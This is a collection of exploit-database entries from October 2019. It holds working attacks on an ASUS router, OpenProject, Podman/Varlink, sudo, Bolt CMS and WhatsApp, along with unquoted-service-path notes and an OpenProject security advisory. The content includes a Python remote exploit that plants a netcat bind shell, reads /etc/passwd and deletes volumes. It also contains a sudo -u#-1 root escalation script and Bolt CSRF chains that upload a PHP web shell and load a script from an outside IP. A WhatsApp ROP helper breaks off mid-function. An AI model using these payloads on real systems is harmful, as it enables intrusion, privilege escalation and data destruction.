# Exploit Title: XSS And CSRF to RCE in ASUS RT-N10 Repeater Mode
# Date: 13/10/2019
# Exploit Author: Matheus Vrech
# Vendor Homepage: https://www.asus.com/
# Version: ASUS RT-N10+, Firmware: 2.0.3.4
# Tested on: Archlinux, Windows 10

# XSS:
# when someone change router to repeater mode you should be able to trigger javascript code:
# just create an AP with the payload ad wait the person to look for the available routers to repeat
vulnerable page: http://192.168.1.1/survey.htm
payload: <svg/onload="alert('xss')">

# CSRF + RCE
# it's possible to inject commands into the router by just triggering a authenticated user to acess the following url:
# change COMMAND to yout command
vulnerable url: http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp&next_page=Main_AdmStatus_Content.asp&next_host=&sid_list=FirewallConfig%3B&group_id=&modified=0&action_mode=+Refresh+&first_time=&action_script=&preferred_lang=EN&SystemCmd=COMMAND&action=Refresh"

# With both of them it's possible to execute command abusing the repeater mode XSS

POC:
# create the page:

<html>
<head>
</head>
<body>
<iframe style="display: none" src="http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp&next_page=Main_AdmStatus_Content.asp&next_host=&sid_list=FirewallConfig%3B&group_id=&modified=0&action_mode=+Refresh+&first_time=&action_script=&preferred_lang=EN&SystemCmd=touch /tmp/pwned&action=Refresh"></iframe>
</body>
</html>

# start your AP:
airbase-ng -e "<iframe src="//your.domain">" -c 8 -v wlp2s0mon

SEC Consult Vulnerability Lab Security Advisory < 20191014-0 >
=======================================================================
              title: Reflected XSS vulnerability
            product: OpenProject
 vulnerable version: <= 9.0.3, <=10.0.1
      fixed version: 9.0.4, 10.0.2
         CVE number: CVE-2019-17092
             impact: medium
           homepage: https://www.openproject.org
              found: 2019-09-27
                 by: David Haintz (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"OpenProject is the leading open source project management software. Support your
project management process along the entire project life cycle: From project
initiation to closure."

Source: https://www.openproject.org/


Business recommendation:
------------------------
Update to the latest version of OpenProject.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected XSS vulnerability (CVE-2019-17092)
The project list of OpenProject lacks input validation on data that is output inside
an error message. Due to the Content Security Policy inline scripts/styles weren't
allowed and the script source was limited to 'self'. To bypass this a JavaScript file
was added as attachment to an existing project. This could be used to extract the CSRF
token and create a new API key.


Proof of concept:
-----------------
1) Reflected XSS vulnerability (CVE-2019-17092)
Within this proof of concept, two steps are done. First the JavaScript code to be
executed is uploaded as an attachment to fulfill the Content Security Policy of
'self'. In the second step the uploaded JavaScript code is executed through the
reflected XSS vulnerability by using a script-tag.

a) Upload JavaScript code
An attacker can upload a JavaScript file as attachment into any project in the default
configuration. The attachment can be called directly, but will be downloaded
automatically. But since the browser doesn't care if a file shall be downloaded or
displayed when loading it from an src-property, an attacker can easily use it for the
reflected XSS vulnerability.

In this proof of concept the following JavaScript code was uploaded:

(async () => {
  var csrf_param = document.querySelector('meta[name=csrf-param]').content;
  var csrf_token = document.querySelector('meta[name=csrf-token]').content;

  var req = await fetch("http://$IP/my/generate_api_key", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
      },
"referrer": "http://$IP/my/access_token",
"body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token),
"method": "POST",
"mode": "cors"
  });

  var resp = await req.text();

  var regex = /(Your access token is:\<br \/\>\<strong\>)(.*)(\<\/strong\>)/gm;
  var api_key = resp.match(regex)[0];
  api_key = api_key.slice(35, -9);
  alert("Generated new API key: " + api_key);
})();


This gets the CSRF token and the parameter name (since this seems to be configurable)
and sends a request to the generate_api_key functionality. After parsing, the key is
exposed in a message box, but can be used for further operations like adding an
administrative user.


b) Craft link
The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the path
'/projects'. There an attacker may add any HTML code.

Such a link could be:
http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available at the
time of the test:

* 10.0.0
* 10.0.1

According to the vendor, all versions before v9.0.3 and v10.0.1 are affected.


Vendor contact timeline:
------------------------
2019-10-02: Contacting vendor through security@openproject.com
2019-10-02: Vendor verified the vulnerability and released the fix
2019-10-08: Verified fixed vulnerability
2019-10-08: Vendor announced that they will publish the CVE and full advisory
2019-10-14: Release of security advisory.


Solution:
---------
The vendor provides an updated version (v10.0.2 and v9.0.4) which should be
installed immediately. Release notes of the vendor:

https://www.openproject.org/release-notes/openproject-9-0-4/
https://www.openproject.org/release-notes/openproject-10-0-2/


Workaround:
-----------
There is no workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF D. Haintz / @2019

#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# pickletime.py
#
# Podman + Varlink Insecure Config Remote Exploit
#
# Jeremy Brown [jbrown3264/gmail] @ Oct 2019
#
# -------
# Details
# -------
#
# Podman is container engine / platform similar to Docker supported
# by RedHat and Fedora with Varlink being a protocol to exchange
# messages, which comes in handy for things like a Remote API.
#
# Now depending on how Podman and Varlink are deployed, they can be
# susceptible to local and remote attacks. There are a few API bugs
# in Podman itself, as well as a way to execute arbitary commands if
# one can hit Podman via the Remote API. Running Podman with Varlink
# over tcp listening either on localhost or the network interface is the
# most vulnerable setup, but other ways such as access via the local UNIX
# socket or over SSH (key /w no passphrase is common) aren't likely
# to be vulnerable unless ACLs or other stuff is broken.
#
# ------------------
# Testing the issues
# ------------------
#
# - check; just connects and issues GetInfo() to see if the host is
#   running a podman service
#
# - exec; arbitrary cmd execution via ContainerRunlabel() specified
#   by "run" label in the specified hosted image (self-setup)
#
# - dos; crash the server via choosing a /random/ selection from
#   the available parsing bugs in APIs (we like to have fun here)
#
# - blind; dir traversal in SearchImages() API to force server to
#   read an arbitrary file (no client-side output)
#
# - volrm; loops to remove all volumes via VolumeRemove() behavior
#
# ---------
# Exec demo
# ---------
#
# $ ./pickletime.py check podman-host:6000
# -> Podman service confirmed on host
#
# Then create a Dockerfile with an edgy label, build and host it.
#
# [Dockerfile]
# FROM busybox
# LABEL run=“nc -l -p 10000 -e /bin/bash”
#
# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run
# Done!
#
# $ nc podman-host 10000
# ps                             
#    PID TTY          TIME CMD   
# 111640 pts/1    00:00:00 bash  
# 111786 pts/1    00:00:00 podman
# 111797 pts/1    00:00:00 nc    
# 111799 pts/1    00:00:00 bash  
# 111801 pts/1    00:00:00 ps    
#
#
# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
#
# -----------
# Other stuff
# -----------
#
# Note: admins can really setup their connection and deployment configuration
# however they like, so it's hard to say how many folks are 'doing it wrong'
# or actually are running with proper auth and hardening in place. Shodan
# folks have been contacted about adding support to discover Varlink services
# to get more data that way as well.
#
# Fixed bugs:
# - DoS #2 was fixed in 1.5.1
# - Updated security docs / cli flags TBD
#
# > Why pickles? Why not.
#
# Dependencies to run this code:
#
# sudo dnf install -y python3-podman-api
#
#
#

import os
import sys
import socket
import subprocess
import random
import json
import podman
import pickle
import time

serviceName = 'io.podman' # service name

def main():
  if(len(sys.argv) < 2):
    print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0])
    print("Eg:    %s check tcp:podman-host:6000" % sys.argv[0])
    print("...    %s exec  tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
    print("Actions: check, exec, dos, blind, volrm\n")
    return

  action = sys.argv[1]
  address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing

  ip = address.split(':')[1]
  port = int(address.split(':')[2])

  if(action == 'exec'):
    if(len(sys.argv) < 4):
      print("Error: need more args for exec")
      return

    image = sys.argv[3] # 'source' for pull
    label = sys.argv[4]

  isItTime()

  try:
    pman = podman.Client(uri=address)
  except Exception:
    print("Error: can't connect to host")
    return

  if(action == 'check'):
    result = json.dumps(pman.system.info())

    if('podman_version' in result):
      print("-> Podman service confirmed on host")
      return

    print("-!- Podman service was not found on host")


  elif(action == 'exec'):
    #
    # First pull the image from the repo, then run the label
    #
    try:
      result = pman.images.pull(image) # PullImage()
    except Exception as error:
      pass # call fails sometimes if image already exists which is *ok*

    #
    # ContainerRunlabel() ... but, no library imp. we'll do it live!
    #
    method = serviceName + '.' + 'ContainerRunlabel'

    message = '{\"method\":\"'
    message += method
    message += '\",\"parameters\":'
    message += '{\"Runlabel\":{\"image\":\"'
    message += image
    message += '\",\"label\":\"'
    message += label
    message += '\"}}}'
    message += '\0' # end each msg with a NULL byte

    doSocketSend(ip, port, message)


  elif(action == 'dos'):
    #bug = 1 # !fun
    bug = random.randint(1,2) # fun

    if(bug == 1):
      print("one")
      source = 'test'

      method = serviceName + '.' + 'LoadImage'

      message = '{\"method\":\"'
      message += method
      message += '\",\"parameters\":'
      message += '{\"source":\"'
      message += source
      message += '\"}}'
      message += '\0'

      doSocketSend(ip, port, message)


    # works on 1.4.4, fixed in 1.5.1
    if(bug == 2):
      print("two")

      reference = 'b' * 238
      source = '/dev/null' # this file must exist locally

      method = serviceName + '.' + 'ImportImage'

      message = '{\"method\":\"'
      message += method
      message += '\",\"parameters\":'
      message += '{\"reference\":\"'
      message += reference
      message += '\",\"source\":\"'
      message += source
      message += '\"}}'
      message += '\0'

      doSocketSend(ip, port, message)


  #
  # blind read of arbitrary files server-side
  # ...interesting but not particularly useful by itself
  #
  # openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7
  # lseek(7, 0, SEEK_CUR)             = 0
  # fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0
  # read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672
  # close(7)
  #
  elif(action == 'blind'):
    method = serviceName + '.' + 'SearchImages'
    query = '../../../etc/passwd/' # magic '/' at the end

    message = '{\"method\":\"'
    message += method
    message += '\",\"parameters\":'
    message += '{\"query\":\"'
    message += query
    message += '\"}}'
    message += '\0'

    #pman.images.search(query) # unclear why this doesn't work
    doSocketSend(ip, port, message)

  #
  # Not really a bug, but an interesting feature to demo without auth
  # note: call CreateVolume() a few times beforehand to test the removal
  #
  elif(action == 'volrm'):
    method = serviceName + '.' + 'VolumeRemove'
    n = 10 # this is probably enough to test, but change as necessary

    message = '{\"method\":\"'
    message += method
    message += '\",\"parameters\":'
    message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal
    message += '\0'

    for _ in range(n):
      doSocketSend(ip, port, message)
      time.sleep(0.5) # server processing time

  print("Done!")


#
# podman/varlink libaries don't support calling these API calls, so native we must
#
def doSocketSend(ip, port, message):
  try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    sock.send(message.encode())

  except Exception as error:
    print(str(error))
    return

  finally:
    sock.close()


#
# obligatory routine
#
def isItTime():
  tm = time.localtime()

  p = pickle.dumps('it\'s pickle time!')

  if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')):
    print(pickle.loads(p))
  else:
    pass # no dill


if(__name__ == '__main__'):
  main()

# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor Homepage: https://www.actfax.com/
# Software Link :  https://www.actfax.com/download/actfax_setup_x64_ge.exe
# Version : ActiveFax Server 6.92 Build 0316
# Tested on Windows 10
# CVE : N/A 

sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveFaxServiceNT
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : ActiveFax-Server-Dienst
        DEPENDENCIES       : 
        SERVICE_START_NAME : .\Administrator

# Exploit Title : sudo 1.8.28 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Version : Sudo <1.2.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : N/A 

'''Check for the user sudo permissions

sudo -l 

User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash


So user hacker can't run /bin/bash as root (!root)


User hacker sudo privilege in /etc/sudoers

# User privilege specification
root    ALL=(ALL:ALL) ALL

hacker ALL=(ALL,!root) /bin/bash


With ALL specified, user hacker can run the binary /bin/bash as any user

EXPLOIT: 

sudo -u#-1 /bin/bash

Example : 

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission
Proof of Concept Code :

How to use :
python3 sudo_exploit.py

'''


#!/usr/bin/python3

import os

#Get current username

username = input("Enter current username :")


#check which binary the user can run with sudo

os.system("sudo -l > priv")


os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binary")

binary= binary_file.read()

#execute sudo exploit

print("Lets hope it works")

os.system("sudo -u#-1 "+ binary)

# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : N/A

# last version

# Csrf p0c
<html>
<body>
<head>
Bolt v 3.x exploit 0day
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">

<script>
      function submitRequest()
      {
        Csrf = async () => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "parent=&foldername=sss&namespace=files";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
        xhr.onreadystatechange = async (e) => {
        if (xhr.readyState === 4 && xhr.status === 200){

};
 JSfuck1();
}

}
      JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){

}


};
where();
      }

      where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);

}
          Csrf();
      }
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>

JS p0c

<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/index.php\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}
};
xhr.send();
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload[select][]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
"\r\n" +
          token

"-----------------------------190530466613268610451083392867--\r\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
 xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
  Shell();
}

};

 var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));

}


Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}

bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}

bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);

}



Token();
</script>


version 6.5

CSrf p0c
<html>
<body>
<head>
Bolt v 3.x CVE-2019-17591 exploit
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">

<script>
      function submitRequest()
      {
        Csrf = async () => {
        const xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
true);
        xhr.setRequestHeader("Accept", "*\/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "filename=test&parentPath=&namespace=files";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
        xhr.onreadystatechange = async (e) => {
        if (xhr.readyState === 4 && xhr.status === 200){
          JSfuck();
}
};


}
      JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'
onerror=alert(1)>";
xhr.send(body1);

}
          Csrf();
      }
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>

Js p0c


<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}


}
xhr.send(null);
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload[select][]\";
filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data;
name=\"file_upload[_token]\"\r\n" +
"\r\n" +
          token

"-----------------------------190530466613268610451083392867--\r\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}
};
      var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
}




Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
charset=UTF-8");
xhr.withCredentials = true;
var body1 =
"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
xhr.send(body1);
}
Token();
</script>

proof of concept :

https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing

https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing

Greetz to :
Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
Virus,m7md1337,D3vil1337,and all my friends

# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Zilab Software Inc
# Version : Zilab Remote Console Server 3.2.9
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
# Tested on Windows 10
# CVE : N/A 


C:\Users\Administrator>sc qc zrcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: zrcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Zilab Remote Console Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path
# Author: Luis MedinaL
# Date: 2019-10-15
# Vendor Homepage: https://www.adaware.com/
# Software Link : https://www.adaware.com/antivirus
# Version : 2.3.4.7
# Tested on:  Microsoft Windows 10 Pro x64 ESP

# Description:
# Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path

C:\Users\Luis ML>sc qc LavasoftTcpService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: LavasoftTcpService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : LavasoftTcpService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp 
* 
*/

#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
    int j;
    const char *base = (const char *)info->dlpi_addr;
    for (j = 0; j < info->dlpi_phnum; j++) {
        const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
        if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
            gadget_p = (char *) base + phdr->p_vaddr;
            return 1;
        }
    }
    return 0;
}

//system address
void* get_system_address(){
    libc = dlopen("libc.so",RTLD_GLOBAL);
    void* address = dlsym( libc, "system");
    return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
    lib = dlopen("libhwui.so",RTLD_GLOBAL);
    dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
    char *buffer;
    long filelen;
    char curChar;
    long pos = 0; int curSearch = 0;
    //reading file
    FILE* fd = fopen("/system/lib64/libhwui.so","rb");
    fseek(fd, 0, SEEK_END);
    filelen = ftell(fd);
    rewind(fd);
    buffer = (char *)malloc((filelen+1)*sizeof(char));
    fread(buffer, filelen, 1, fd);
    fclose(fd);
    //searching for bytes
    byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
    while(pos <= filelen){
        curChar = buffer[pos];pos++;
        if(curChar == g1[curSearch]){
            curSearch++;
            if(curSearch > 11){
                curSearch = 0;
                pos-=12;
                break;
            }
        }
        else{
            curSearch = 0;
        }
    }
    return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
    char buff[30];
    //system address
